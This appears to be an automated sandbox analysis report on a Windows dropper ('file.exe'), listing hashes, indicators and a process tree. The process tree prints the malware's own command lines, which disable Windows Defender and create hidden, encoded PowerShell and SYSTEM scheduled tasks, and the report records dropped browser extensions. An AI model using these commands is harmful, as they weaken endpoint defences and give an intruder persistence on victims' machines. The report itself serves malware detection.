Analysis
-
max time kernel
85s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27/10/2022, 03:22
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
472c4c7b91604de725148b1b54094783
-
SHA1
fa7cbbc338952bbed9894f82e394806b5d243f5e
-
SHA256
d2cd009f0704f64dfeeab1d5243b407fb1d0dc2d373b6e86b0def9b06b4bf205
-
SHA512
47940e8cf9bdae1384196f15fccce12a698e96494111d9ee9d12589be07502f1b2bff4a80afec9937f51e789c5736309a6327f8b8a45d606665c00a0f3f4da82
-
SSDEEP
196608:91On2jG9R5+u5xtZ3R+NVfbVbVteNmKR9QJQVlcjWsuCn:3On+G9R5R5p34zJaNlR9QJwlcjWsZn
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 64 4708 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 3232 Install.exe 3296 Install.exe 2356 qGHonBo.exe 3492 CCgOIWq.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation CCgOIWq.exe -
Loads dropped DLL 1 IoCs
pid Process 4708 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json CCgOIWq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json CCgOIWq.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini CCgOIWq.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 CCgOIWq.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini qGHonBo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 CCgOIWq.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 CCgOIWq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CCgOIWq.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol qGHonBo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 CCgOIWq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CCgOIWq.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\lVrlTdgfhXOU2\pMKcXze.xml CCgOIWq.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\pZQHVgb.xml CCgOIWq.exe File created C:\Program Files (x86)\oQtMlHEnfKUn\mBEVvZY.dll CCgOIWq.exe File created C:\Program Files (x86)\CrVpqlWoU\KOvRAz.dll CCgOIWq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja CCgOIWq.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\LNrfmbR.xml CCgOIWq.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CCgOIWq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CCgOIWq.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\PCLXWDG.dll CCgOIWq.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\dKPOHvXRqAxzO.dll CCgOIWq.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\lSnjRnH.dll CCgOIWq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CCgOIWq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CCgOIWq.exe File created C:\Program Files (x86)\CrVpqlWoU\vfHuAIq.xml CCgOIWq.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\wLvsIRnBfEcGhlAOV.job schtasks.exe File created C:\Windows\Tasks\gJECdJUNuqvNlNQ.job schtasks.exe File created C:\Windows\Tasks\CDUwqlMPSeBRbvnPZ.job schtasks.exe File created C:\Windows\Tasks\bKFjthDDlmdmBdSpYV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4336 schtasks.exe 4404 schtasks.exe 3888 schtasks.exe 2852 schtasks.exe 3992 schtasks.exe 4384 schtasks.exe 2152 schtasks.exe 3916 schtasks.exe 3064 schtasks.exe 5068 schtasks.exe 4820 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume CCgOIWq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000} CCgOIWq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket CCgOIWq.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" CCgOIWq.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ CCgOIWq.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" CCgOIWq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\MaxCapacity = "15140" CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" CCgOIWq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\NukeOnDelete = "0" CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer CCgOIWq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" CCgOIWq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1228 powershell.EXE 1228 powershell.EXE 4064 powershell.exe 4064 powershell.exe 4704 powershell.exe 4704 powershell.exe 1724 powershell.EXE 1724 powershell.EXE 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe 3492 CCgOIWq.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1228 powershell.EXE Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 1724 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4496 wrote to memory of 3232 4496 file.exe 82 PID 4496 wrote to memory of 3232 4496 file.exe 82 PID 4496 wrote to memory of 3232 4496 file.exe 82 PID 3232 wrote to memory of 3296 3232 Install.exe 83 PID 3232 wrote to memory of 3296 3232 Install.exe 83 PID 3232 wrote to memory of 3296 3232 Install.exe 83 PID 3296 wrote to memory of 2152 3296 Install.exe 86 PID 3296 wrote to memory of 2152 3296 Install.exe 86 PID 3296 wrote to memory of 2152 3296 Install.exe 86 PID 3296 wrote to memory of 3784 3296 Install.exe 88 PID 3296 wrote to memory of 3784 3296 Install.exe 88 PID 3296 wrote to memory of 3784 3296 Install.exe 88 PID 2152 wrote to memory of 1948 2152 forfiles.exe 90 PID 2152 wrote to memory of 1948 2152 forfiles.exe 90 PID 2152 wrote to memory of 1948 2152 forfiles.exe 90 PID 3784 wrote to memory of 4088 3784 forfiles.exe 91 PID 3784 wrote to memory of 4088 3784 forfiles.exe 91 PID 3784 wrote to memory of 4088 3784 forfiles.exe 91 PID 1948 wrote to memory of 456 1948 cmd.exe 92 PID 1948 wrote to memory of 456 1948 cmd.exe 92 PID 1948 wrote to memory of 456 1948 cmd.exe 92 PID 4088 wrote to memory of 1084 4088 cmd.exe 93 PID 4088 wrote to memory of 1084 4088 cmd.exe 93 PID 4088 wrote to memory of 1084 4088 cmd.exe 93 PID 1948 wrote to memory of 2388 1948 cmd.exe 94 PID 1948 wrote to memory of 2388 1948 cmd.exe 94 PID 1948 wrote to memory of 2388 1948 cmd.exe 94 PID 4088 wrote to memory of 2964 4088 cmd.exe 95 PID 4088 wrote to memory of 2964 4088 cmd.exe 95 PID 4088 wrote to memory of 2964 4088 cmd.exe 95 PID 3296 wrote to memory of 3888 3296 Install.exe 97 PID 3296 wrote to memory of 3888 3296 Install.exe 97 PID 3296 wrote to memory of 3888 3296 Install.exe 97 PID 3296 wrote to memory of 3596 3296 Install.exe 99 PID 3296 wrote to memory of 3596 3296 Install.exe 99 PID 3296 wrote to memory of 3596 3296 Install.exe 99 PID 1228 wrote to memory of 4648 1228 powershell.EXE 103 PID 1228 wrote to memory of 4648 1228 powershell.EXE 103 PID 3296 wrote to memory of 1724 3296 Install.exe 111 PID 3296 wrote to memory of 1724 3296 Install.exe 111 PID 3296 wrote to memory of 1724 3296 Install.exe 111 PID 3296 wrote to memory of 2852 3296 Install.exe 113 PID 3296 wrote to memory of 2852 3296 Install.exe 113 PID 3296 wrote to memory of 2852 3296 Install.exe 113 PID 2356 wrote to memory of 4064 2356 qGHonBo.exe 117 PID 2356 wrote to memory of 4064 2356 qGHonBo.exe 117 PID 2356 wrote to memory of 4064 2356 qGHonBo.exe 117 PID 4064 wrote to memory of 3588 4064 powershell.exe 119 PID 4064 wrote to memory of 3588 4064 powershell.exe 119 PID 4064 wrote to memory of 3588 4064 powershell.exe 119 PID 3588 wrote to memory of 2028 3588 cmd.exe 120 PID 3588 wrote to memory of 2028 3588 cmd.exe 120 PID 3588 wrote to memory of 2028 3588 cmd.exe 120 PID 4064 wrote to memory of 544 4064 powershell.exe 121 PID 4064 wrote to memory of 544 4064 powershell.exe 121 PID 4064 wrote to memory of 544 4064 powershell.exe 121 PID 4064 wrote to memory of 1064 4064 powershell.exe 122 PID 4064 wrote to memory of 1064 4064 powershell.exe 122 PID 4064 wrote to memory of 1064 4064 powershell.exe 122 PID 4064 wrote to memory of 4456 4064 powershell.exe 123 PID 4064 wrote to memory of 4456 4064 powershell.exe 123 PID 4064 wrote to memory of 4456 4064 powershell.exe 123 PID 4064 wrote to memory of 4692 4064 powershell.exe 124 PID 4064 wrote to memory of 4692 4064 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\7zS75E0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS78CE.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:456
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2388
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1084
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2964
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLGqrfwGn" /SC once /ST 04:15:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLGqrfwGn"4⤵PID:3596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLGqrfwGn"4⤵PID:1724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 05:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\qGHonBo.exe\" JF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2852
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2396
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\qGHonBo.exeC:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\qGHonBo.exe JF /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2356 -
